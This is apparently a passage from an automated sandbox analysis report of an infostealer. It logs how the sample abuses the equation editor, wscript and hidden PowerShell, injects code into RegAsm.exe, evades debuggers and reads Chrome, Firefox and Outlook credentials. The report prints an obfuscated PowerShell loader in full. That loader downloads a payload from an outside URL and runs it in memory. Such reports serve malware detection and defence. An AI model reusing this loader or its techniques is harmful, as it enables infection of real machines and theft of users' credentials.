                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2524 | Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00407877 FindFirstFileW,FindNextFileW
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_0044E8F9 FindFirstFileExA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_10006580 FindFirstFileExA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0040AE51 FindFirstFileW,FindNextFileW
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00418981 memset,GetSystemInfo
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | API call chain: ExitProcess graph end node
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00443355 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_10004AB4 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00411D39 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00434BD8 SetUnhandledExceptionFilter
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00412132 GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00419662 mouse_event
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS"
                  Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $pSHOmE[4]+$PSHOME[34]+'X')( ('HqRur'+'l '+'= '+'VUF'+'ht'+'t'+'ps://i'+'a6'+'00100.us.archive.or'+'g/'+'24/it'+'ems/d'+'e'+'ta'+'h-no'+'t'+'e-v/De'+'t'+'ahNote'+'V.txtVU'+'F'+';HqRba'+'se64'+'C'+'ontent = (New'+'-Obje'+'ct'+' Sys'+'tem'+'.N'+'e'+'t.We'+'b'+'C'+'li'+'e'+'nt'+')'+'.Downl'+'o'+'adS'+'tri'+'ng(HqRurl);HqRbi'+'naryContent = [S'+'ystem.C'+'o'+'n'+'vert]::FromBas'+'e64Stri'+'ng(HqRbase'+'64C'+'ont'+'ent);HqR'+'as'+'sembly'+' = [R'+'eflection.As'+'sem'+'bly]::Load(H'+'qRb'+'inar'+'yC'+'on'+'t'+'ent);'+'Hq'+'Rtype ='+' '+'H'+'qRasse'+'mbly.GetType(V'+'UFRun'+'P'+'E.'+'HomeVUF'+');H'+'qR'+'met'+'hod = HqRt'+'ype.GetMet'+'hod('+'VUFVA'+'IVUF);HqRmet'+'hod.Invoke(HqR'+'null'+', [object[]]@(VU'+'Ftxt.'+'VBGR/'+'05'+'5/2'+'5'+'.01.92.58'+'1//:'+'ptthVUF , '+'VUFd'+'esa'+'t'+'iv'+'ad'+'oVUF '+','+' VU'+'Fd'+'esati'+'v'+'ad'+'oV'+'UF'+' '+','+' V'+'UFde'+'s'+'ati'+'vadoVUF,'+'VUFRe'+'gAsmV'+'UF,VUFV'+'UF))').Replace(([cHAr]72+[cHAr]113+[cHAr]82),[StRIng][cHAr]36).Replace(([cHAr]86+[cHAr]85+[cHAr]70),[StRIng][cHAr]39) )"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\xngebzmuliqlvokkyghpdzaillbyo"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ahlxcrfozqiqgugoprcrgenrualhhmmku"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\muezvmgbhtns"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjmo"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wjfueylyjgoymkoaaythvh"
                  Source: RegAsm.exe, 00000009.00000002.884633008.00000000007C9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00434CB6 cpuid 9_2_00434CB6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW, 9_2_0045201B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW, 9_2_004520B6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 9_2_00452143
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW, 9_2_00452393
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW, 9_2_00448484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 9_2_004524BC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW, 9_2_004525C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 9_2_00452690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW, 9_2_0044896D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoA, 9_2_0040F90C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: IsValidCodePage,GetLocaleInfoW, 9_2_00451D58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW, 9_2_00451FD0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041B890 GetSystemTimes,Sleep,GetSystemTimes,__aulldiv, 9_2_0041B890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041B69E GetComputerNameExW,GetUserNameW, 9_2_0041B69E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 9_2_00449210
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0041739B GetVersionExW, 13_2_0041739B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match File source: 8.2.powershell.exe.439db68.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 8.2.powershell.exe.63d0000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 8.2.powershell.exe.63d0000.2.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 8.2.powershell.exe.439db68.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000008.00000002.385255527.00000000063D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000008.00000002.383266190.0000000004289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 8.2.powershell.exe.3cf0b60.1.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 8.2.powershell.exe.3cf0b60.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000009.00000002.884633008.0000000000795000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000009.00000002.884633008.00000000007C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000009.00000002.884633008.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000008.00000002.383266190.0000000003889000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: powershell.exe PID: 3680, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 3792, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 9_2_0040BA4D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 9_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: \key3.db 9_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
